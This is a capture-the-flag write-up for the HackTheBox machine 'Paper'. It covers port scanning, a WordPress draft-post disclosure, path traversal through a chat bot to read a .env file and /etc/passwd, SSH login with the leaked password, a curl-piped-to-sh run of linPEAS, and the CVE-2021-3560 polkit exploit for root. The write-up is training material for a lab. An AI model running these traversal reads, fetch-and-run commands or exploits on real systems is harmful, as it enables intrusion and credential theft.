Post

HTB Paper Writeup

INFO

Machine IP = 10.10.11.143
OS = Linux
Level = Easy
Points = 20

SCANNING

- Nmap:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
# Nmap 7.92 scan initiated Sun Mar 13 11:10:47 2022 as: nmap -sV -sC -oA /home/kali/Desktop/nmap/Paper 10.10.11.143
Nmap scan report for 10.10.11.143
Host is up (0.28s latency).
Not shown: 997 closed tcp ports (reset)
PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey: 
|   2048 10:05:ea:50:56:a6:00:cb:1c:9c:93:df:5f:83:e0:64 (RSA)
|   256 58:8c:82:1c:c6:63:2a:83:87:5c:2f:2b:4f:4d:c3:79 (ECDSA)
|_  256 31:78:af:d1:3b:c4:2e:9d:60:4e:eb:5d:03:ec:a0:22 (ED25519)
80/tcp  open  http     Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1k mod_fcgid/2.3.9
443/tcp open  ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
|_ssl-date: TLS randomness does not represent time
|_http-generator: HTML Tidy for HTML5 for Linux version 5.7.28
|_http-title: HTTP Server Test Page powered by CentOS
| http-methods: 
|_  Potentially risky methods: TRACE
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=Unspecified/countryName=US
| Subject Alternative Name: DNS:localhost.localdomain
| Not valid before: 2021-07-03T08:52:34
|_Not valid after:  2022-07-08T10:32:34
| tls-alpn: 
|_  http/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 13 11:11:22 2022 -- 1 IP address (1 host up) scanned in 34.86 seconds

ENUMERATION

- Ports:

1
2
3
4
PORT      STATE    SERVICE       VERSION
22/tcp    open     ssh           OpenSSH 8.0 (protocol 2.0)
80/tcp    open     http          Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)
443/tcp   open     ssl/http      Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1k mod_fcgid/2.3.9)

With port 80 we have only a simple static page.

- Gobuster:

1
gobuster dir -u http://10.10.11.143 -w /usr/share/wordlists/dirb/big.txt -x php,txt,html,js -t 80 -o gobuster.log

After Gobuster No! usefull information.

By check the certificate over https site on port 443 we got nothing.

With checking the responce of headers with the port 80 we found a vhost [office.paper] let’s add this to /etc/hosts file.

1
echo "10.10.11.143    office.paper" >> /etc/hosts

Here with our new VHost office.paper by checking footer, theme, and Wappalyzer [a browser extension] we can confirm there’s a WordPress hosted with version 5.2.3 which is vulnerable for Unauthenticated View Private/Draft Posts.

And there’s a one comment which tell michael to remove the secret content in drafts ASAP.

But for reaching this drafts we need admin creads that we don’t have it yet.

For that we just need to add ?static=1 after the url.

1
http://office.paper/?static=1

The results we get a new secret that tell us about new vhost and registration url. let’s add the vhost in /etc/hosts file.

1
2
3
sudo nano /etc/hosts

10.10.11.143    office.paper chat.office.paper

Go to new VHost then registration url we get the registration form let’s register ourself. After login then click on general room.

In the chat there is recyclops bot that helps the user to list the sales directory with list command and with file command we can view the content inside the file.

I used the list and file command to get the content inside directory.

the list command list the directory of current path let’s try directory Path Traversal using ../

And we get the previous directory content. hubot directory looks interesting let’s check the content in that.

Got a .env file. .ENV file usually use to store secrets.

let’s check the content in that using file ../hubot/.env

And we got the username [recyclops] and password[Queenofblad3s!23].

Let’s back and check the user available in this machine using file ../../../etc/passwd and we found [dwight] have access to [/bin/bash]

USER FLAG

- Privilege Escalation [User]

So let’s do ssh with preview password and user dwight And we got the user.txt

1
[dwight@paper ~]$ cat user.txt 

ROOT FLAG

let’s run linPEAS.

1
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh

And we see this machine is vulnerable to CVE-2021-3560 that is Polkit or Pwnkit which allows unprivileged user to call privileged methods using DBus.

- Privilege Escalation [Root]

Let’s get this python script inside this machine and run this.

1
https://github.com/Almorabea/Polkit-exploit/blob/main/CVE-2021-3560.py
1
2
$ chmod +x CVE-2021-3560.py 
$ python3 CVE-2021-3560.py 

maybe you need to run it multi times.

then we get the root.txt file.

1
[root@paper]# cat root.txt 

Hi there 👋 Support me!

Life is an echo—what you send out comes back.

Donate

This post is licensed under CC BY 4.0 by the author.